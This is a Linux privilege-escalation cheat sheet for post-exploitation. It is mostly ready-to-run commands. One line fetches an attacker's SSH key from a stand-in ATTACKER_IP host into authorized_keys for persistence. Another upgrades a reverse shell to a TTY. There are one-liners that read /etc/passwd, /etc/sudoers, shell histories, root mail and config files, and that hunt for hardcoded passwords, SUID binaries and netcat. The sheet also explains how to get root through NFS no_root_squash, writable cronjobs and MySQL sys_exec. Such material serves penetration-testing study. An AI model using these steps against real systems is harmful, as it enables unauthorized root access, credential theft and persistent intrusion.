Linux Privilege Escalation

Post exploitation

Get a TTY shell after a reverse shell connection

$ python -c 'import pty;pty.spawn("/bin/bash")'

Set PATH TERM and SHELL if missing:

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:

$ echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authorized_keys

Linux Privesc

Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.

First try simple sudo:

$ sudo su -

What can we run with sudo?

$ sudo -l

Try su as all users and the username as password

What services are running as root?:

$ ps aux | grep root

Look for vulnerable/privileged components such as: mysql, sudo, udev, python

If /etc/exports if writable, you can add an NFS entry or change and existing entry adding the no_root_squash flag to a root directory, put a binary with SUID bit on, and get root.

If there is a cronjob that runs as run but it has incorrect file permissions, you can change it to run your SUID binary and get a shell.

The following command will list processes running by root, permissions and NFS exports.

$ echo 'services running as root'; ps aux | grep root;  echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

Use netstat to find other machines connected

$ netstat -ano

Command to skip ignored lines in config files

$ alias nonempty="egrep -v '^[ \t]*#|^$'"

If Mysql is running as root, you can run commands using sys_exec(). For instance, to add user to sudoers:

sys_exec('usermod -a -G admin username')

More about mysql:

https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

Find linux distribution & version

$ cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;

Architecture

$ cat /proc/version; uname -a; uname -mrs; rpm -q kernel; dmesg | grep Linux; ls /boot | grep vmlinuz-; file /bin/ls; cat /etc/lsb-release

Environment variables

$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set

Find printers

$ lpstat -a

Find apps installed;

$ ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/*;

Find writable configuration files

$ find /etc/ -writable -type f 2>/dev/null

Miss-configured services

$ cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

Scheduled jobs

$ crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny

Grep hardcoded passwords

$ grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

if web server run in web root:

$ grep "localhost" ./ -R

Network configuration

$ /sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L; hostname; dnsdomainname

List other users home directories

$ ls -ahlR /root/; ls -ahlR /home/

User bash history

$ cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history

User mails

$ cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root

Find interesting binaries

$ find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp

Mounted filesystems

$ mount; df -h; cat /etc/fstab

Look for binaries with the SUID or GUID bits set.

$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
$ find / -perm -1000 -type d 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null

Find other uses in the system

 $id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l